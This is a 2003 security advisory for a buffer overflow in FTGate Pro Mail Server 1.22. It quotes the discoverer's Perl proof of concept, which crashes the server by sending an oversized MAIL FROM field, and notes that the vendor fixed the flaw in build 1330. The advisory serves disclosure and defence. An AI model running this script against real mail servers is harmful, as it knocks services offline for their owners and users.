Skip navigation
Menu
Collaboration>Email and Calendaring

Buffer Overrun Vulnerability in Floosietek FTGate Pro Mail Server 1.22

Reported May 06, 2003, by Dennis Rand.

 

 

VERSIONS AFFECTED

 

  • Floosietek FTGate Pro Mail Server 1.22 (build 1328)

 

DESCRIPTION

 

A vulnerability in FTGate Pro Mail Server 1.22 (build 1328) can result in the execution of arbitrary code on the vulnerable system. This vulnerability stems from a buffer-overflow condition. If an attacker sends a large amount of code  into the MAIL FROM and the RCPT TO fields, the buffer will overflow. Using carefully crafted code, the attacker can use system privileges to execute arbitrary commands.

 

DEMONSTRATION

 

The discoverer posted the following code as proof of concept:

 

----------------------------- \[Exploit Code\] --------------------------

#!/usr/bin/perl -w ################## # FTGate Pro Mail Server v. 1.22

(1328) DoS attack # # URL: http://www.infowarfare.dk/ # EMAIL:

[email protected] # USAGE: sploit.pl <target ip> # # Summary: # # The

problem is a Buffer Overflow in the SMTP protocol, within the

# ESMTP Server FTGate, causing the service to stop responding for a short #

Period, where we can actually overwrite the exception handler on the stack

allowing

# A system compromise with code execution running as SYSTEM.

#

#

# Solution:

# Upgrade to FTGate Pro Mail Server v. 1.22 (HotFix 1330) or later #

#

 

use IO::Socket;

   

$target = shift() || "warlab.dk";

my $port = 25;

my $Buffer = "a" x 2400;

 

 

my $sock = IO::Socket::INET->new (

                                    PeerAddr => $target,

                                    PeerPort => $port,

                                    Proto => 'tcp'

                                 ) || die "could not connect: $!";

 

my $banner = <$sock>;

if ($banner !~ /^2.*/)

\{

    print STDERR "Error: invalid server response '$banner'.\n";

    exit(1);

\}

 

print $sock "HELO $target\r\n";

$resp = <$sock>;

 

print $sock "MAIL FROM: $Buffer\@$Buffer.dk\r\n";

$resp = <$sock>;

 

print $sock "\r\n";

print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

 

close($sock);

----------------------------- \[Exploit Code\] --------------------------

 

VENDOR RESPONSE

 

Floosietek has released build 1330, which isn't vulnerable to this condition.

 

CREDIT                                                                                                       

 

Discovered by Dennis Rand.

TAGS: Security
Hide comments

More information about text formats

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish
Recommended Reading
zoom logo
Zoom Releases New AI-Powered Collaboration Platform—Zoom Workspace—Plus Other Updates
Mar 26, 2024
person working from home using smart phone and notebook computer
Monitoring Employee Productivity, Balance Surveillance with Transparency
Jan 03, 2024
zoom logo on screens of laptop and smartphone device.jpg
At Zoomtopia, Small Businesses Share Transformation Stories
Oct 12, 2023
zoom logo
Zoom Unveils Docs, Upgrades Contact Center Offerings
Oct 03, 2023